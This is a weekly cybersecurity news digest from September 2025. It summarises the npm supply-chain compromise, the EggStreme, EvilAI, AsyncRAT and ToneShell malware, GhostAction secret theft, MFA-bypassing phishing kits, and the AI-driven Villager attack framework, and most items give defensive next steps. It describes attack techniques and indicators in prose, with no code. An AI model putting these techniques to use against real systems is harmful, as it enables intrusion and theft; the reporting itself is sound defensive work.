Cybersecurity News Worth Your Attention This Week Summarised – 2025-09-15

This week feels like a greatest hits album of “what could possibly go wrong.” We’ve got npm packages with 2 billion total downloads getting phished!, a Chinese APT sneaking around entirely in memory, and AI-branded apps that look shiny and good, actually do what they are supposed to but turn out to be pure malware. Kind of starting to feel likethis is an impossible fight …

P.S. If you get value out of this summary, make sure to subscribe to it via e-mail (scroll down) or we also publish it on our LinkedIn every Monday.

1. Massive npm Supply Chain Attack Compromises 18 Packages with 2 Billion Weekly Downloads

On September 8, attackers phished a maintainer via a spoofed npm support email and injected obfuscated, browser‐based malware into 18 high-use npm packages — chalk, debug, ansi-styles and others totaling 2 billion weekly downloads. The code hooks into Web3/browser APIs to silently rewrite cryptocurrency transaction destinations, redirecting funds to attacker-controlled wallets; actual theft was under $1,000. 

Key Details

• Compromised packages include chalk (300 M), debug (358 M), ansi-styles (371 M).
• Phishing domain “[cencored].help” mimicked npmjs.org to steal 2FA credentials
• Malware hooks fetch, XMLHttpRequest, window.ethereum, etc., to swap wallet addresses
• Aikido detected and disclosed the breach within minutes; theft tracked at ~$970

Read more at Aikido Security, CSO Online

2. Chinese APT Deploys EggStreme Fileless Malware Against Philippine Military Contractor

Security researchers at Bitdefender uncovered EggStreme, a novel fileless malware framework used by a China-linked APT to infiltrate a Philippine military company over a year-long espionage campaign.  EggStreme’s core backdoor—EggStremeAgent—executes entirely in memory via DLL sideloading, keylogging, and gRPC-based C2 communications, enabling stealthy reconnaissance, lateral movement, and data theft.  

Key Details

• EggStremeAgent supports 58 commands – including system profiling, shellcode execution, and an injected keylogger tracking keystrokes and clipboard data.
• Malware uses legitimate Windows services and DLL sideloading to load encrypted modules into memory, leaving no decrypted payloads on disk.
• All C2 traffic uses encrypted gRPC channels, and attackers maintain fallback servers for resilience.

Read more at Bitdefender, The Record

3. EvilAI Malware Uses AI-Driven Fake Productivity Apps to Evade Detection

A new campaign tracked as "EvilAI" hides Trojan-style malware inside fully functional, AI-branded tools with realistic UIs and valid digital signatures. In just one week, Trend Micro has spotted hundreds of organizations across manufacturing, government, healthcare and more infected via search ads, social media and fake vendor portals.  EvilAI apps perform normal tasks while mapping environments, disabling browsers and security products, then laying groundwork for future payloads—leaving static antivirus defenses blind to their activity.  

Key Details

• Operators created new “disposable” companies to get code-signing certificates for apps like Recipe Maker and Manual Finder.
• Distribution via malicious search-engine ads, promoted links and counterfeit vendor sites.
• After install, apps scan for installed AV/EDR, kill Edge/Chrome processes and disable Bitdefender, Kaspersky and Fortinet products.
• Uses control-flow flattening, anti-analysis loops and registry/scheduled-task persistence to thwart signature scanners.

Next Steps

• Enforce application allow-listing for unapproved tools.
• Share this with your organisation as an exmaple that even very legitimate looking apps can be malicious.
• Validate digital certificates against known trusted vendors.

Read more at Trend Micro, Dark Reading

4. GhostAction campaign exfiltrates 3,325 secrets via malicious GitHub Actions workflows

Attackers injected a rogue GitHub Actions workflow into the FastUUID project on September 2, harvesting 3,325 secrets from 817 repositories, including PyPI, npm, DockerHub, AWS, Cloudflare and GitHub tokens, before being contained on September 5. 

Key Details

• Malicious workflow introduced by “Grommash9” on Sep 2 in the FastUUID repository
• Campaign spread to 817 repos, affecting 327 users and exfiltrating secrets via HTTP POST to a single endpoint
• Stolen tokens span PyPI, npm, DockerHub, GitHub, Cloudflare API, AWS access keys and database credentials
• GitGuardian contained the attack on Sep 5. 573 projects notified; 9 npm and 15 PyPI packages still at risk

Next Steps

• Audit all GitHub Actions workflows for unauthorized changes
• Rotate and revoke any potentially exposed tokens immediately
• Enforce least-privilege permissions on CI/CD secrets and workflows

Read more at CSO Online

5. Legacy OAuth Tokens in SalesLoft-Drift Deal Expose Fourth-Party Risk

A recent breach of SalesLoft’s acquired Drift chat platform abused dormant OAuth tokens—some inactive for over 18 months—to pivot into customer Salesforce and Google Workspace environments. The incident underscores “fourth-party” risk, where organizations inherit unseen integrations and permissions through vendor M&A, greatly expanding their attack surface beyond traditional third-party controls.

Key Details

• Attackers leveraged active Drift OAuth tokens to access hundreds of Salesforce instances and some Google Workspace accounts.
• Tokens likely predated SalesLoft’s February 2024 acquisition of Drift and remained valid until explicitly revoked.
• Traditional vendor assessments rarely track a supplier’s acquisition history or inherited OAuth access.

Next Steps

• Start monitoring M&A-s of your high risk vendors (set up a Google Alert)

Read more at CSO Online

6. Compromised ScreenConnect Used to Deploy Fileless AsyncRAT via In-Memory Loader

Security researchers at LevelBlue Labs uncovered a fileless attack chain that leverages a compromised ScreenConnect client to load AsyncRAT entirely in memory, bypassing disk-based defenses. 
The multi-stage VBScript and PowerShell loader uses .NET reflection, AMSI/ETW disabling, and a disguised scheduled task for persistence, exposing organizations to credential theft and full remote control.

Key Details

• Initial access via unauthorized ScreenConnect relay at relay.shipperzone.online
• Update.vbs script runs PowerShell to fetch two .NET payloads (`logs.ldk`, `logs.ldr`) into memory
• Loader assembly patches AMSI and ETW, then invokes secondary AsyncRAT assembly via reflection
• Persistence achieved by a scheduled task named “Skype Update”; C2 config encrypted with AES-256 linking to DuckDNS server

Next Steps

• Alert on scheduled tasks using updater-style names and monitor AMSI/ETW modifications

Read more at CSO Online

7. VoidProxy PhaaS Uses AitM Phishing to Bypass MFA on Microsoft, Google Accounts

Okta researchers discovered VoidProxy, a phishing-as-a-service platform using Adversary-in-the-Middle techniques to intercept passwords, MFA codes, and session tokens from Microsoft and Google login flows. The scalable, multi-layered attack bypasses SMS and OTP protections, leveraging disposable domains and Cloudflare defenses to evade email filters and security tools.

Key Details

• Phishing emails sent from compromised ESP accounts redirect through URL shorteners and multiple Cloudflare-protected domains.
• Users face a CAPTCHA check then a perfect replica of Microsoft or Google login pages; automated scanners see only a benign “Welcome” page.
• VoidProxy’s reverse proxy captures credentials, MFA codes, and session cookies, enabling attackers to hijack validated sessions.
• Anti-analysis measures include dynamic DNS, disposable low-cost TLDs, and Cloudflare Workers to mask infrastructure.

Next Steps

• Cosnider enforcing phishing-resistant authenticators (passkeys, security keys) for more employees.

Read more at CSO Online

8. New Salty2FA Phishing Kit Evolves to Enterprise-Grade, Bypasses MFA

Salty2FA phishing kit now uses advanced subdomain rotation, dynamic branding, multiple MFA simulations and anti-research tactics to mimic enterprise software. Static IOCs and traditional defenses fail against these enterprise-grade phishing campaigns.

Key Details

• Rotates subdomains every session to evade blacklists and tracking
• Auto-applies authentic corporate branding for six different MFA flows
• Leverages legitimate platforms (e.g., Aha.io trial) to host phishing lures
• Uses geo-blocking, ASN/IP filtering and JavaScript anti-debugging

Read more at Dark Reading

9. Apple Debuts Memory Integrity Enforcement in iPhone 17 and iPhone Air to Counter Mercenary Spyware

Apple’s upcoming iPhone 17 and iPhone Air will ship with Memory Integrity Enforcement (MIE), a hardware-and-firmware feature that enforces real-time memory tagging to block buffer overflows and use-after-free exploits. By integrating Enhanced Memory Tagging Extension (EMTE) in the new A19 and A19 Pro chips, Apple raises the bar for mercenary spyware developers, making zero-click exploit chains costlier and harder to build and offering customers industry-first, always-on memory safety without performance impact.

Read more at Cybersecurity News

10. AI-Powered Villager Framework Automates Advanced Attacks via Kali Linux and DeepSeek AI

Villager is a new AI-driven penetration testing framework that integrates Kali Linux tools with DeepSeek AI to fully automate multi-stage cyber attacks. Distributed via PyPI with self-destructing containers and randomized SSH ports, it lowers the skill barrier for sophisticated intrusions and compresses detection and response windows for enterprises.

Key Details

• Developed by Chinese-based Cyberspike and released on PyPI in July 2025, Villager hit over 10,000 downloads in two months.
• Uses a Model Context Protocol (MCP) client on port 25989 with a database of 4,201 AI prompts to orchestrate exploits.
• Spawns isolated Kali Linux containers for scanning and assessment, auto-wiping logs after 24 hours and rotating SSH ports.
• Integrates DeepSeek AI (“al-1s-20250421” model via HTTP API) to adapt attack steps e.g., launching WPScan on WordPress targets.

Read more at Cybersecurity News

11. ToneShell Backdoor Abuses Windows Task Scheduler COM Service for Stealthy Persistence

The latest ToneShell variant leverages the Windows Task Scheduler COM interfaces to create a one-minute recurring task, ensuring its payload runs continuously from %APPDATA%, bypassing registry run-key detections.  

Delivered via sideloaded DLLs in themed archives, it evades sandbox checks and blends into the user profile structure, complicating discovery by traditional file-based or service-installation heuristics.  

Key Details

• Archives contain a legitimate loader and a renamed malicious DLL that probes for sandbox artifacts.
• Backdoor copies itself and Visual C++ runtime libraries to a new subfolder under %APPDATA% to avoid scrutiny.
• Uses ITaskService and IRegisteredTask COM interfaces to register a “dokanctl” scheduled task in the root folder.
• The task runs %APPDATA%\svchosts.exe every minute, masquerading as a legitimate Windows process.

Next Steps

• Audit root-folder tasks for unexpected names or executables in %APPDATA%.

Read more at Cybersecurity News

Subscribe

Subscribe to receive weekly cybersecurity news summary to your inbox every Monday.